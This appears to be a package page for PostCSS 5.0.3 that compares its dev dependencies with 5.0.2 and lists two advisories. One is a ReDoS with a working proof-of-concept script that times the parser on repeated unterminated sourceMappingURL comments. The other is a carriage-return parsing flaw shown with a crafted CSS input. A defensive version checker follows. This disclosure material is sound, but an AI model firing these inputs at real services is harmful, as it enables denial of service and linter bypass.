PostCSS version 5.0.3 represents a minor update to the popular CSS transformation tool, building upon the foundation established by version 5.0.2. Both versions retain the core functionality of enabling developers to manipulate CSS with JavaScript plugins, offering a powerful and flexible approach to styling web projects. They share the same core dependencies, ensuring consistent performance in areas like Base64 encoding (js-base64), source map generation (source-map), and color support detection (supports-color).
However, several differences in the development dependencies mark the refinements made in version 5.0.3. The eslint dependency was updated from version 1.2.1 to 1.3.0, bringing newer lint rules and style checks. The babel-core dependency moved from 5.8.22 to 5.8.23, a patch release of the Babel transpiler, while babel-eslint was updated from 4.0.10 to 4.1.0 to keep the linter compatible with it. The fs-extra dependency was bumped from 0.23.1 to 0.24.0, a minor release of the file-manipulation helpers used by the build and tests. The postcss-parser-tests dependency was incremented from 5.0.0 to 5.0.1, a patch release of the parser test fixtures.
These updates, while seemingly small, collectively contribute to a more robust and reliable development environment for PostCSS users. Developers can expect incremental improvements in code quality, transpilation accuracy, and overall stability when upgrading to version 5.0.3. The changes reflect a commitment to continuous improvement and responsiveness to the evolving needs of the web development community, making PostCSS a continuously improving choice for CSS transformations.
All vulnerabilities related to version 5.0.3 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern:

\/\*\s* sourceMappingURL=(.*)
```javascript
var postcss = require("postcss")

// Builds a rule followed by n unterminated source-map annotations.
function build_attack(n) {
  var ret = "a{}"
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL="
  }
  return ret + "!";
}

// Warm-up parse with a well-formed annotation.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

// Time the parser on increasingly long inputs and print the cost per length.
for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i)
    try {
      postcss.parse(attack_str)
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    } catch (e) {
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
  }
}
```
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, those parts are included in the PostCSS output as CSS nodes (rules, properties) despite originally being inside a comment.
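Both advisories above are fixed by upgrading, so the first check a practitioner wants is whether an installed postcss version falls in either affected range. The following is an added example, not code from the advisories or the PostCSS project; it assumes the ReDoS range is v < 7.0.36 or 8.0.0 <= v < 8.2.13 (8.2.13 taken as the first fixed 8.x release) and the line-return range is v < 8.4.31.

```javascript
// Added example: classify a postcss version against the two advisories quoted on this page.
// Assumed ranges (from the advisory text): ReDoS affects < 7.0.36 and 8.0.0 <= v < 8.2.13;
// the \r parsing issue affects < 8.4.31.

// Parse "MAJOR.MINOR.PATCH"; a leading "v" and any pre-release/build suffix are ignored.
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(v).trim());
  if (!m) throw new Error("unrecognised version: " + v);
  return m.slice(1, 4).map(Number);
}

// Numeric three-part comparison: negative if a < b, 0 if equal, positive if a > b.
function compareVersions(a, b) {
  const x = parseVersion(a);
  const y = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (x[i] !== y[i]) return x[i] - y[i];
  }
  return 0;
}

// Half-open range test: lo <= v < hi.
function inRange(v, lo, hi) {
  return compareVersions(v, lo) >= 0 && compareVersions(v, hi) < 0;
}

// Returns which of the two advisories apply to the given postcss version.
function postcssAdvisories(version) {
  const redos =
    compareVersions(version, "7.0.36") < 0 || inRange(version, "8.0.0", "8.2.13");
  const crlfParsing = compareVersions(version, "8.4.31") < 0;
  return { redos: redos, crlfParsing: crlfParsing, patched: !redos && !crlfParsing };
}

// Sample run: the version this page describes, each boundary release, and a fixed release.
// In a real build step the version would be read from node_modules/postcss/package.json.
for (const v of ["5.0.3", "7.0.36", "8.1.0", "8.2.13", "8.4.31"]) {
  console.log(v, JSON.stringify(postcssAdvisories(v)));
}
```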